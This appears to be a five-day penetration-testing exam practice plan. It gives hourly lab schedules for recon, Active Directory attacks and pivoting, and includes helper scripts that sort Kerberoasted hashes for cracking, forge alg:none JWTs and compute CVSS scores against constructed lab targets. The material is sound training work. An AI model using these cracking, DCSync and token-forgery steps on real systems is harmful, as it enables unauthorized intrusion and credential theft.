⚠ SIMULATION RULES (read before starting)
Treat each simulation day as a real exam. No walkthroughs, no hints until you've spent the allocated time. Document everything as you go: your notes from each simulation are your report drafts.
// Duration: Each sim day = 8 focused hours. Hour 5 is the break-plus-documentation hour: step away, then write up before resuming.
// Documentation: Screenshot every compromise. Note timestamps. Write findings as you go, not at the end.
// Tools Allowed: Same as the real exam: Kali tools, custom scripts, HTB VPN access.
// After Each Day: Write a 1-page debrief: what worked, what didn't, what you'd do differently.
DAY 1
Enumeration Blitz
Focus: External recon → Web foothold → Linux privesc
8 hours · 4 targets
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
Full Network Scan
Nmap all 4 targets with a full TCP port scan. Document all open ports, services, OS. Do NOT start exploitation yet. Scan the four hosts, not the whole /24: -p- with -sC -sV across 254 addresses will not finish inside the hour.
nmap -sC -sV -p- --open -T4 -oA initial 10.10.10.101-104
H2: 1:00–2:00
Web Enumeration
Fuzz all HTTP/HTTPS services. Identify tech stack, CMS, hidden directories, parameters.
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://TARGET/FUZZ
H3-4: 2:00–4:00
Exploitation Window #1
Attack the easiest web target. Get initial foothold. Enumerate local system post-compromise.
H5: 4:00–5:00
BREAK + Documentation
Step away 30 min. Return and write up what you've found so far in report format.
H6-7: 5:00–7:00
Privilege Escalation
Run LinPEAS/WinPEAS on compromised host. Find and exploit privesc path. Document thoroughly.
./linpeas.sh | tee /tmp/linpeas.txt
H8: 7:00–8:00
Report Writing Sprint
Write 2 complete findings from today's work. Include: title, CVSS, PoC, impact, remediation.
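The hand-off from H1 (scan) to H2 (fuzz every HTTP/HTTPS service) is where time leaks: four hosts expose web services on assorted ports and the list gets rebuilt by hand. This added shell example, not part of the original plan, parses the .gnmap file that -oA initial writes and emits one URL per open HTTP-like service, then builds the ffuf job list from it. The scan output embedded below is a constructed sample shaped like the Day 1 targets, not a real scan; the function and file names are mine.

```sh
#!/bin/sh
# Added example: turn nmap grepable output (-oA initial -> initial.gnmap) into a list of
# web targets for the H2 fuzzing hour. The embedded scan data is constructed, not real output.

# Constructed sample of what initial.gnmap looks like for the Day 1 targets.
# Real gnmap separates fields with tabs; the parser only relies on whitespace.
sample_gnmap() {
  cat <<'EOF'
# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.101 () Status: Up
Host: 10.10.10.101 () Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.6p1/, 80/open/tcp//http//Apache httpd 2.4.29/ Ignored State: closed (65532)
Host: 10.10.10.102 () Ports: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/open/tcp//http//nginx 1.18.0/, 443/open/tcp//ssl|http//nginx 1.18.0/ Ignored State: closed (65532)
Host: 10.10.10.104 () Ports: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0/ Ignored State: filtered (65533)
EOF
}

# Print one URL per open port whose nmap service name is http-like.
# Each port entry is port/state/proto/owner/service/rpcinfo/version; nmap rewrites any '/'
# inside a field as '|' (hence "ssl|http"), so splitting on '/' is safe.
http_targets_from_gnmap() {   # $1 = path to a .gnmap file
  awk '/Ports:/ {
    host = $2
    sub(/.*Ports: /, "")
    n = split($0, ports, /, /)
    for (i = 1; i <= n; i++) {
      split(ports[i], f, "/")
      if (f[2] != "open") continue
      svc = f[5]
      if (svc == "http" || svc == "http-proxy" || svc == "http-alt") scheme = "http"
      else if (svc == "https" || svc == "ssl|http" || svc == "https-alt") scheme = "https"
      else continue
      printf "%s://%s:%s\n", scheme, host, f[1]
    }
  }' "$1"
}

# How many web targets the file yields: a sanity check before committing the hour to fuzzing.
count_http_targets() { http_targets_from_gnmap "$1" | wc -l | tr -d ' '; }

# Dry run: print the ffuf job list (drop the leading echo to execute it). One JSON output file per target.
ffuf_jobs() {   # $1 = .gnmap file, $2 = wordlist
  http_targets_from_gnmap "$1" | while IFS= read -r url; do
    echo ffuf -w "$2" -u "$url/FUZZ" -o "ffuf_$(printf '%s' "$url" | tr ':/.' '___').json" -of json
  done
}

if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp); sample_gnmap > "$tmp"
  ffuf_jobs "$tmp" /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
  rm -f "$tmp"
fi
```

Run it as `sh recon_targets.sh --demo` against the sample, or point `http_targets_from_gnmap initial.gnmap` at the real file. One caveat the sample makes visible: nmap labels WinRM on 5985 as plain "http" (Microsoft HTTPAPI), so it lands in the list too. Fuzzing it is harmless but wasteful; that port belongs to the Day 1 Windows target's WinRM, not a web app.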
// TODAY'S TARGETS
10.10.10.101
WEB-01 (Linux)
Apache 2.4, PHP, MySQL. Custom CMS with upload functionality.
HTTP:80 · SSH:22 · FTP:21
10.10.10.102
WEB-02 (Linux)
Nginx, Python Flask API. JWT authentication. Potential IDOR.
HTTP:80 · HTTPS:443 · SSH:22
10.10.10.103
BACKUP-01 (Linux)
FTP anonymous allowed. NFS exports. Old backup files in shares.
FTP:21 · NFS:2049 · SSH:22
10.10.10.104
WIN-01 (Windows 10)
IIS 10, WinRM enabled. MSSQL Express listening on a non-standard port (SQL Server Express defaults to a dynamic port rather than 1433, so take the actual port from the full-port scan).
HTTP:80 · WinRM:5985 · MSSQL (non-standard port)
DAY 2
Active Directory Assault
Focus: Domain enumeration → Kerberoasting → ACL abuse → DA
8 hours · AD Lab
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
BloodHound Collection
Run bloodhound-python (BloodHound.py) with all collection methods, using the starting creds (jdoe / Welcome1) and pointing both DNS and the DC at 10.10.10.5. Run GetUserSPNs and GetNPUsers in parallel.
bloodhound-python -u jdoe -p Welcome1 -d corp.local -ns 10.10.10.5 -dc dc01.corp.local -c All --zip
H2: 1:00–2:00
BloodHound Analysis
Import data. Find shortest paths from your user to DA. Identify Kerberoastable + AS-REP targets. Mark owned accounts.
H3-4: 2:00–4:00
Kerberoasting + Cracking
Extract all SPNs, crack with hashcat. For each cracked account, check BloodHound for new paths. Run ADCS enum.
hashcat -m 13100 spns.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
H5: 4:00–5:00
BREAK + Pivot Planning
Map out the full attack chain on paper. What's your current access? What's the next step to DA?
H6-7: 5:00–7:00
ACL Abuse / ADCS / DA Path
Execute the attack chain. If stuck, try alternate path (AS-REP, ADCS, Pass-the-Hash). Goal: DCSync.
impacket-secretsdump corp.local/admin@DC_IP -just-dc-ntlm
H8: 7:00–8:00
Document DA Access + Write Findings
Screenshot DA access (C$ share, whoami on DC). Write 3 AD findings: Kerberoastable accounts, path taken, DCSync.
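Between H3-4 (crack) and H8 (document) there is bookkeeping the plan glosses over: GetUserSPNs and GetNPUsers emit hashes in different formats that need different hashcat modes (the -m 13100 above only covers RC4 TGS-REPs), and hashcat --show returns hash:password, not account:password. This added shell example, not part of the original plan, sorts a mixed hash file by mode and maps cracked lines back to account names so you can mark them owned in BloodHound. The hashes embedded below are constructed, with fake truncated hex bodies; only their header structure matters. Function and file names are mine.

```sh
#!/bin/sh
# Added example (not from the original plan): sort roasted Kerberos hashes into the right hashcat
# mode and map hashcat --show output back to account names. Sample hashes are constructed.

# hashcat mode by hash prefix. GetUserSPNs emits $krb5tgs$<etype>$..., GetNPUsers emits $krb5asrep$23$...
kerb_hash_mode() {   # $1 = one hash line; prints the mode, or nothing if unrecognised
  case "$1" in
    '$krb5tgs$23$'*)   echo 13100 ;;   # TGS-REP, RC4-HMAC (etype 23): the usual Kerberoast case
    '$krb5tgs$17$'*)   echo 19600 ;;   # TGS-REP, AES128-CTS (etype 17)
    '$krb5tgs$18$'*)   echo 19700 ;;   # TGS-REP, AES256-CTS (etype 18): AES-only service accounts
    '$krb5asrep$23$'*) echo 18200 ;;   # AS-REP, RC4-HMAC (etype 23): users without pre-auth
  esac
}

# Account name embedded in a roasted hash. Split on '$'; the three formats differ slightly:
#   $krb5tgs$23$*user$REALM$spn*$cksum$edata     -> field 4 is "*user"
#   $krb5tgs$17$user$REALM$*spn*$cksum$edata      -> field 4 is "user"
#   $krb5asrep$23$user@REALM:cksum$edata          -> field 4 is "user@REALM:cksum"
kerb_hash_account() {
  printf '%s\n' "$1" | awk -F'$' '{ u = $4; sub(/^\*/, "", u); sub(/[@:].*$/, "", u); print u }'
}

# Write each hash into $2/kerb_<mode>.txt so every mode gets its own hashcat run.
split_by_mode() {   # $1 = mixed hash file (GetUserSPNs + GetNPUsers output), $2 = output dir
  while IFS= read -r h; do
    m=$(kerb_hash_mode "$h")
    if [ -n "$m" ]; then printf '%s\n' "$h" >> "$2/kerb_$m.txt"; fi
  done < "$1"
}

# Convert hashcat --show lines ("hash:password") into "account:password".
# TGS-REP hashes contain no ':' but a cracked password may, so split on the first colon.
# AS-REP hashes contain exactly one ':' themselves (user@REALM:cksum), so the password starts
# after the second colon; getting this wrong silently truncates every AS-REP password.
cracked_to_accounts() {   # stdin: hashcat --show output
  while IFS= read -r line; do
    case "$line" in
      '$krb5asrep$'*) rest=${line#*:}; hash="${line%%:*}:${rest%%:*}"; pass=${rest#*:} ;;
      *)              hash=${line%%:*}; pass=${line#*:} ;;
    esac
    printf '%s:%s\n' "$(kerb_hash_account "$hash")" "$pass"
  done
}

# Constructed sample hashes: hex bodies are fake and truncated; only the headers are realistic.
sample_hashes() {
  cat <<'EOF'
$krb5tgs$23$*svc_sql$CORP.LOCAL$corp.local/svc_sql*$1a2b3c4d$5e6f7a8b
$krb5tgs$18$svc_backup$CORP.LOCAL$*corp.local/svc_backup*$9c0d1e2f$3a4b5c6d
$krb5asrep$23$jsmith@CORP.LOCAL:7e8f9a0b$1c2d3e4f
EOF
}

if [ "${1:-}" = "--demo" ]; then
  d=$(mktemp -d); h=$(mktemp); sample_hashes > "$h"
  split_by_mode "$h" "$d"
  for f in "$d"/kerb_*.txt; do
    mode=${f##*kerb_}; mode=${mode%.txt}
    echo "hashcat -m $mode $f rockyou.txt -r /usr/share/hashcat/rules/best64.rule"
  done
  rm -rf "$d" "$h"
fi
```

After cracking, `hashcat -m 13100 --show kerb_13100.txt | sh this_script.sh` style piping into `cracked_to_accounts` gives the account:password list for the BloodHound "mark owned" step. The etype 17/18 entries are the ones that quietly fail under the page's -m 13100 command: a service account with AES-only msDS-SupportedEncryptionTypes never produces an RC4 ticket, and feeding its hash to the wrong mode just yields a format error.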
// AD ENVIRONMENT
10.10.10.5
DC01.CORP.LOCAL (DC)
Windows Server 2019. ADCS installed. 3 Kerberoastable service accounts. 1 AS-REP roastable user.
LDAP:389 · SMB:445 · ADCS
10.10.10.10
FS01.CORP.LOCAL (File Server)
Windows Server 2016. SMB shares. Helpdesk group has GenericWrite on IT_MANAGERS.
SMB:445 · WinRM:5985
Initial Creds
jdoe / Welcome1
Low-privilege domain user. Member of Domain Users only. Starting point for all enumeration.
domain user · no special groups
Hint: Attack Path
Hidden Path Available
There are 2 paths to DA. One via Kerberoasting + ACL chain. One via ADCS ESC1. Try to find both without hints.
DAY 3
Web Application Deep Dive
Focus: SQLi, XSS, file upload, SSRF, IDOR across two multi-vuln web apps
8 hours · 2 web apps
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
Manual Recon + Burp Setup
Proxy all traffic through Burp. Map every endpoint, parameter, function manually. No automated scanning yet.
H2: 1:00–2:00
Parameter Fuzzing
Fuzz all parameters for SQLi, XSS, command injection. Use wfuzz or Burp Intruder. Note every anomaly.
wfuzz -c -z file,/usr/share/seclists/Fuzzing/SQLi/quick-SQLi.txt -u "http://TARGET/item?id=FUZZ"
H3-4: 2:00–4:00
Exploit SQLi + File Upload
Confirm and exploit SQLi (manual + sqlmap). Find file upload endpoint and bypass extension/MIME restrictions.
sqlmap -u "http://TARGET/item?id=1" --level=5 --risk=3 --dbs
H5: 4:00–5:00
BREAK + Findings Review
List all confirmed vulns. Prioritize by severity. Plan remaining exploitation.
H6-7: 5:00–7:00
App 2: SSRF + IDOR
Second application focuses on business logic flaws. Test all IDOR patterns. Hunt for SSRF to internal services.
H8: 7:00–8:00
Write 4 Web Findings
SQLi, File Upload, IDOR, SSRF: write each as a complete pentest finding with CVSS score and PoC steps.
// WEB TARGETS
10.10.10.110
SHOP-APP (PHP/MySQL)
E-commerce application. Product search vulnerable to SQLi. Admin file upload accepts multiple types. Login has weak session handling.
SQLi · File Upload · Auth Bypass
10.10.10.111
API-PLATFORM (Node.js)
REST API, JWT auth. User profile endpoint uses sequential IDs (IDOR). URL fetch function for importing data (SSRF). GraphQL endpoint exposed.
IDOR · SSRF · GraphQL
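Both JWT-protected targets (WEB-02 on Day 1 and API-PLATFORM here) reward knowing what is inside the token before you start the IDOR sweep: the user identifier in the payload is usually the same sequential ID the profile endpoint takes. This added shell example, not part of the original plan, decodes JWT segments by hand (base64url, no padding), reads the alg claim, and builds an alg:none variant with a tampered payload so you understand what Burp's JWT tooling does. The token below is constructed with a bogus signature, not taken from any target; function names are mine.

```sh
#!/bin/sh
# Added example (not from the original plan): decode and tamper with JWTs using only sh, base64, tr and sed.
# SAMPLE_TOKEN is constructed here with a fake signature; it is not from any target.

# JWT segments are base64url without padding: '-' for '+', '_' for '/', no trailing '='.
# GNU base64 -d rejects unpadded input, so the padding is restored before decoding.
b64url_decode() {
  s=$(printf '%s' "$1" | tr '_' '/' | tr -- '-' '+')
  pad=$(( (4 - ${#s} % 4) % 4 ))
  while [ "$pad" -gt 0 ]; do s="$s="; pad=$((pad - 1)); done
  printf '%s' "$s" | base64 -d
}

b64url_encode() {
  printf '%s' "$1" | base64 | tr -d '\n=' | tr '/' '_' | tr '+' '-'
}

jwt_header()  { b64url_decode "${1%%.*}"; }               # first dot-separated segment
jwt_payload() { t=${1#*.}; b64url_decode "${t%%.*}"; }   # second segment

# The alg claim from the header. Plain sed so it works on a pivot box without jq.
jwt_alg() { { jwt_header "$1"; echo; } | sed -n 's/.*"alg" *: *"\([^"]*\)".*/\1/p'; }

# Re-issue a tampered payload under "alg":"none" with an empty signature segment.
# Only meaningful if the server library still honours alg=none; a correct verifier rejects it outright.
jwt_forge_none() {   # $1 = tampered payload JSON
  printf '%s.%s.\n' "$(b64url_encode '{"alg":"none","typ":"JWT"}')" "$(b64url_encode "$1")"
}

# Constructed sample token: HS256 header, low-privilege payload, fake signature segment.
SAMPLE_TOKEN="$(b64url_encode '{"alg":"HS256","typ":"JWT"}').$(b64url_encode '{"sub":"1","role":"user"}').c2lnbmF0dXJl"

if [ "${1:-}" = "--demo" ]; then
  echo "alg:     $(jwt_alg "$SAMPLE_TOKEN")"
  echo "payload: $(jwt_payload "$SAMPLE_TOKEN")"
  echo "forged:  $(jwt_forge_none '{"sub":"2","role":"admin"}')"
fi
```

Use `jwt_payload "$TOKEN"` on a captured Authorization header to read the sub claim, then drive the IDOR test from neighbouring IDs. Send the alg:none token once as a control: acceptance is a finding on its own; rejection tells you the signature is actually verified and tampering has to go through the key (weak HS256 secret, or a kid/jku trick) instead.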
Practice Resources
DVWA / HackTheBox Web
Practice on DVWA locally for web vulns, then tackle real HTB web challenges: Bolt, Horizontall, Pandora for similar scenarios.
DAY 4
Pivoting Gauntlet
Focus: Multi-hop pivoting, double pivot, internal AD via tunnel
8 hours · 3 networks
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
DMZ Foothold
Compromise the DMZ host using the provided vulnerability. Enumerate every network interface, connected route and known neighbour to map the internal subnets (minimal hosts often lack arp; ip neigh shows the same table).
ip -br a; ip route; ip neigh; arp -a; cat /etc/hosts
H2: 1:00–2:00
Setup Ligolo-ng Pivot
Create the ligolo TUN interface on Kali and start the proxy. Upload the Ligolo-ng agent to the DMZ host and connect it back to the proxy, start the tunnel in that agent's session, then add the route for internal subnet 1 and verify connectivity (a ping or a quick port scan across the tunnel).
sudo ip route add 172.16.5.0/24 dev ligolo
H3-4: 2:00–4:00
Internal Network Enum + Compromise
Scan 172.16.5.0/24 via tunnel. Find and compromise a host. Enumerate its interfaces for deeper subnet.
H5: 4:00–5:00
BREAK + Route Planning
Draw the network topology on paper. Which subnets are reachable? Which host connects to which network?
H6-7: 5:00–7:00
Double Pivot to Deep Network
In the proxy, with the DMZ agent's session selected, add a listener that forwards back to the proxy port (command below). Start Agent2 on the dual-homed internal host and point it at the DMZ host's 172.16.5.x address on 11602; its session then appears in the proxy as if it had connected directly. Add a route for 192.168.100.0/24 through Agent2's tunnel (older Ligolo-ng versions need a second TUN interface for the second session), then scan and attack 192.168.100.0/24.
listener_add --addr 0.0.0.0:11602 --to 127.0.0.1:11601
H8: 7:00–8:00
Document Pivot Chain
Draw full network map with attack path. Write a "Network Segmentation Bypass" finding. Document all compromised hosts.
// NETWORK TOPOLOGY
10.10.10.120
DMZ-WEB (Linux)
Directly reachable. Has eth0 (10.10.10.0/24) and eth1 (172.16.5.0/24). Vulnerable CMS for initial access.
DMZ · dual-homed
172.16.5.0/24
Internal Network 1
3 Windows hosts. File server with SMB, DC candidate, workstation. Accessible only via DMZ pivot.
SMB:445 · WinRM:5985 · RDP:3389
192.168.100.0/24
Deep Internal Network
Only reachable via double pivot. Contains the final target: a Linux database server with sensitive data.
double pivot needed · MySQL:3306
DAY 5
Full Report Day
Focus: No hacking. Write the complete exam report from the Day 1–4 notes.
8 hours · Report Only
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
Report Structure Setup
Open SysReptor. Create new project. Set up all sections: Executive Summary, Scope, Methodology, Findings, Appendix. Don't fill content yet.
H2-3: 1:00–3:00
Write All Findings
Target: 8–10 findings from 4 days. For each: title, CVSS 3.1 with vector, affected systems, PoC steps, impact, remediation. Aim for 15–20 min per finding.
H4: 3:00–4:00
Executive Summary
Write 1–2 page executive summary. Non-technical language. Cover: what was tested, what was found (severity counts), overall risk level, top 3 recommendations.
H5: 4:00–5:00
BREAK + Self Review
Step away. Return with fresh eyes. Read the report top to bottom as if you're the client.
H6-7: 5:00–7:00
Polish + Screenshots + Appendix
Add all screenshots to PoC sections. Verify CVSS scores. Add network diagram. Write attack narrative in methodology section. Check all commands are reproducible.
H8: 7:00–8:00
Export + Quality Check
Export PDF. Review formatting, page breaks, code blocks. Fix any issues. Time yourself: can you produce this quality in 2 exam days?
// REPORT STANDARDS
Finding Quality
What Graders Look For
Clear title. Accurate CVSS. Numbered PoC steps a junior can follow. Business impact (not just "attacker can run code"). Actionable remediation.
CVSS Examples
Common CPTS Scores
RCE via web vuln → 9.8 Critical. Kerberoasting → 8.8 High. SMB null session → 5.3 Medium. Password policy weakness → 7.5 High. These are typical values, not defaults: score the vector you actually exploited and let the number follow from it.
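"Verify CVSS scores" in H6-7 is easier when the number is computed from the vector you chose rather than recalled. This added shell example, not from the original page, implements the CVSS v3.1 base-score equations and qualitative bands from the FIRST specification in awk, and its demo mode reproduces the four scores quoted above from the vectors that usually produce them. Those four vectors are my reconstruction of the typical metric choices (unauthenticated network RCE; authenticated domain user for Kerberoasting; confidentiality-only low impact for a null session; confidentiality-only high impact for the password-policy finding), not something the page states.

```sh
#!/bin/sh
# Added example (not from the original page): CVSS v3.1 base score from a vector string.
# Metric weights, the scope-changed impact formula and the Roundup function follow the FIRST
# CVSS v3.1 specification (section 7.1 and appendix A). No network access, no dependencies beyond awk.

cvss31_base() {   # $1 = vector such as CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ; prints the base score
  printf '%s\n' "$1" | awk -F'/' '
    function min(a, b) { return a < b ? a : b }
    # Roundup as defined in v3.1: integer arithmetic avoids floating-point artefacts such as 4.000000001.
    function roundup(x,  i) {
      i = int(x * 100000 + 0.5)
      if (i % 10000 == 0) return i / 100000
      return (int(i / 10000) + 1) / 10
    }
    {
      for (k = 1; k <= NF; k++) { split($k, kv, ":"); m[kv[1]] = kv[2] }   # the CVSS:3.1 prefix lands here harmlessly
      av["N"] = 0.85; av["A"] = 0.62; av["L"] = 0.55; av["P"] = 0.20
      ac["L"] = 0.77; ac["H"] = 0.44
      ui["N"] = 0.85; ui["R"] = 0.62
      cia["H"] = 0.56; cia["L"] = 0.22; cia["N"] = 0
      changed = (m["S"] == "C")
      # Privileges Required weighs more when the vulnerable and impacted components differ (scope changed).
      if (m["PR"] == "N") pr = 0.85
      else if (m["PR"] == "L") pr = changed ? 0.68 : 0.62
      else pr = changed ? 0.50 : 0.27
      iss = 1 - (1 - cia[m["C"]]) * (1 - cia[m["I"]]) * (1 - cia[m["A"]])
      if (changed) impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ^ 15
      else impact = 6.42 * iss
      expl = 8.22 * av[m["AV"]] * ac[m["AC"]] * pr * ui[m["UI"]]
      if (impact <= 0) score = 0
      else if (changed) score = roundup(min(1.08 * (impact + expl), 10))
      else score = roundup(min(impact + expl, 10))
      printf "%.1f\n", score
    }'
}

# Qualitative severity bands from the same specification.
cvss31_severity() {   # $1 = numeric base score
  awk -v s="$1" 'BEGIN {
    if (s == 0) print "None"; else if (s < 4) print "Low"; else if (s < 7) print "Medium";
    else if (s < 9) print "High"; else print "Critical" }'
}

# Demo: the four scores the page quotes, from the vectors that typically produce them (my reconstruction).
if [ "${1:-}" = "--demo" ]; then
  for v in \
    'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H' \
    'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H' \
    'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N' \
    'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'; do
    s=$(cvss31_base "$v"); printf '%-48s %s %s\n' "$v" "$s" "$(cvss31_severity "$s")"
  done
fi
```

Paste the vector string into the finding next to the score so a grader can check one against the other. The scope metric is where most self-scored reports drift: a DCSync or a pivot out of a DMZ is S:C and picks up the 1.08 multiplier and the different PR weights, which is why an otherwise identical vector jumps from 9.8 to 10.0.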
Executive Summary
Structure Template
[1] What was tested and when. [2] Summary of findings by severity. [3] Most critical finding highlighted. [4] Overall security posture. [5] Top 3 recommendations.
Time Target
Benchmark Speed
You should complete a 10-finding report in 6–8 hours. If it takes longer, practice more with SysReptor templates before exam day.